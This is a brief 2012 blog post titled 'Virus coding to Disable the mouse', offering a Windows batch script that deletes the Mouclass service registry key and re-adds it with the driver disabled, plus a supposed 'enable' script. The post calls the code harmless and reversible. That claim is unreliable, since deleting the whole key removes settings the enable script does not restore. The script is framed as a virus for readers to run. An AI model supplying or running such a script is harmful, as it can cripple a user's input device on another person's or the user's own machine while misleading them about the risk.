Virus coding to Disable the mouse ~ latest-cracker

Ads 468x60px

Tuesday, June 5, 2012

Virus coding to Disable the mouse



Description:
This is harmless code to temporary disable the mouse by editing the registry. You can enable it again with no hassle. 


Code:

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

Testing:-
1.Copy the code above, paste in in notepad, and save it with any name having extension .bat.
2. Click the bat file to disable Mouse.




Enable Mouse Again:-
To enable Mouse again, copy the code below, make a bat file and click on it.


rem ---------------------------------
rem Enable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1
rem --------------------------------- 

0 comments:

Post a Comment

 

money mail